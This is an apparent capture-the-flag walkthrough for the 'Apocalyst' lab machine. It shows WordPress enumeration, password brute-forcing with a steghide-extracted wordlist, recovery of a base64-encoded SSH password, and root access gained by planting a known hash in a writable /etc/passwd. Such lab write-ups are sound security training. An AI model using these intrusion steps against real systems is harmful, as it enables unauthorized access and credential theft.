Difficulty Rating:

Machine: Apocalyst
OS: Linux
Target IP: 10.10.10.46
Source IP: 10.10.15.8

  • Nikto
$ sudo wpscan -u http://10.10.10.46 -e
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.46/
[+] Started: Sun Aug 20 18:59:45 2017

[!] The WordPress 'http://10.10.10.46/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.10.46/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.46/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.46/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://10.10.10.46/wp-content/themes/twentyseventeen/
 |  Readme: http://10.10.10.46/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://10.10.10.46/wp-content/themes/twentyseventeen/style.css
 |  Referenced style.css: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:34 <=====================================================================================================================================> (1545 / 1545) 100.00% Time: 00:00:34

[+] No plugins found

[+] Enumerating installed themes (only ones with known vulnerabilities) ...

   Time: 00:00:05 <=======================================================================================================================================> (281 / 281) 100.00% Time: 00:00:05

[+] No themes found

[+] Enumerating timthumb files ...

   Time: 00:00:51 <=====================================================================================================================================> (2541 / 2541) 100.00% Time: 00:00:51

[+] No timthumb files found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+----------+-----------------------------------+
    | Id | Login    | Name                              |
    +----+----------+-----------------------------------+
    | 1  | falaraki | falaraki – Apocalypse Preparation |
    +----+----------+-----------------------------------+

[+] Finished: Sun Aug 20 19:01:33 2017
[+] Requests Done: 4461
[+] Memory used: 60.945 MB
[+] Elapsed time: 00:01:48
  • Nikto
nikto -h http://10.10.10.46
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.46
+ Target Hostname:    10.10.10.46
+ Target Port:        80
+ Start Time:         2017-08-20 18:58:48 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Server leaks inodes via ETags, header found with file /down/, fields: 0x9d 0x55549bf3e2655 
+ OSVDB-3092: /down/: This might be interesting...
+ OSVDB-3092: /hidden/: This might be interesting...
+ OSVDB-3092: /idea/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /information/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7508 requests: 5 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-08-20 19:33:16 (GMT5.5) (2068 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

  • CeWL (Custom wordlist)
    cewl -w apocalyst_wl http://10.10.10.46
    
  • Dirsearch based on cewl
    $ python3 ~/dirsearch/dirsearch.py -u http://10.10.10.46 -w apocalyst_wl -e php -r -f -F -t 100 --plain-text-report=apocalyst_dirsearch01
    
Output is stored in file apocalyst_dirsearch01

/Righteousness looks interesting as only that file has different size

  • Steghide
    $ steghide extract -sf image.jpg -xf apocalyst_data.txt
    Enter passphrase: 
    wrote extracted data to "apocalyst_data.txt".
    
  • Passphrase is empty, so just press enter.

  • Wpscan to brute-force password with username falaraki
$ sudo wpscan -u http://apocalyst.htb -w ~/apocalyst_data.txt -U falaraki
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://apocalyst.htb/
[+] Started: Sun Aug 20 22:04:47 2017

[!] The WordPress 'http://apocalyst.htb/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://apocalyst.htb/?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://apocalyst.htb/xmlrpc.php
[!] Upload directory has directory listing enabled: http://apocalyst.htb/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://apocalyst.htb/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://apocalyst.htb/wp-content/themes/twentyseventeen/
 |  Readme: http://apocalyst.htb/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://apocalyst.htb/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : falaraki Password : Transclisiation

  Brute Forcing 'falaraki' Time: 00:00:19 <============================================================================                                    > (336 / 487) 68.99%  ETA: 00:00:09
  +----+----------+------+-----------------+
  | Id | Login    | Name | Password        |
  +----+----------+------+-----------------+
  |    | falaraki |      | Transclisiation |
  +----+----------+------+-----------------+

[+] Finished: Sun Aug 20 22:05:23 2017
[+] Requests Done: 410
[+] Memory used: 21.344 MB
[+] Elapsed time: 00:00:35
  • After logging in WP-admin panel, upload your payload from file manager.
  • Now you’ve got shell
$ ls -la /home/falaraki
total 56
drwxr-xr-x 4 falaraki falaraki 4096 Aug 20 18:26 .
drwxr-xr-x 3 root     root     4096 Jul 26 12:40 ..
-rw-rw-r-- 1 falaraki falaraki 1024 Aug 20 16:46 ..wp-config.php.swp.swp
-rw------- 1 falaraki falaraki  516 Jul 27 12:09 .bash_history
-rw-r--r-- 1 falaraki falaraki  220 Jul 26 12:40 .bash_logout
-rw-r--r-- 1 falaraki falaraki 3771 Jul 26 12:40 .bashrc
drwx------ 2 falaraki falaraki 4096 Jul 26 12:41 .cache
-rw------- 1 falaraki falaraki  164 Aug 20 16:53 .mysql_history
drwxrwxr-x 2 falaraki falaraki 4096 Jul 26 13:52 .nano
-rw-r--r-- 1 falaraki falaraki  655 Jul 26 12:40 .profile
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26 17:29 .secret
-rw-r--r-- 1 falaraki falaraki    0 Jul 26 12:42 .sudo_as_admin_successful
-rw------- 1 falaraki falaraki 3620 Aug 20 18:26 .viminfo
-rw-r--r-- 1 root     root     1024 Jul 27 09:17 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki   33 Jul 26 17:27 user.txt
$ cat /home/falaraki/user.txt
XXXXXXX

User Owned!

  • Contents of /home/falaraki/.secret are base64 encoded.
    $ cat .secret 
    S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=
    
  • After Decoding it you get the password for SSH.

  • Password for SSH with username falaraki is Y0uAINtG37TiNgTH!sUzersP4ss
  • python to get sha-512 for word test
    >>> import crypt
    >>> crypt.crypt("test")
    '$6$21enH4CDtH6OuY.Y$9LqSeVx51tDBEpEJ..RNG/oAnnE/xrunAqj5gVeMMbpiK5fLbNVaqzVdkv2pX1LOtq2OqYvEn.U8cNYcz10uR/'
    
$ cat /etc/passwd
root:$6$21enH4CDtH6OuY.Y$9LqSeVx51tDBEpEJ..RNG/oAnnE/xrunAqj5gVeMMbpiK5fLbNVaqzVdkv2pX1LOtq2OqYvEn.U8cNYcz10uR/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
User and Root owned!!

Share the fun!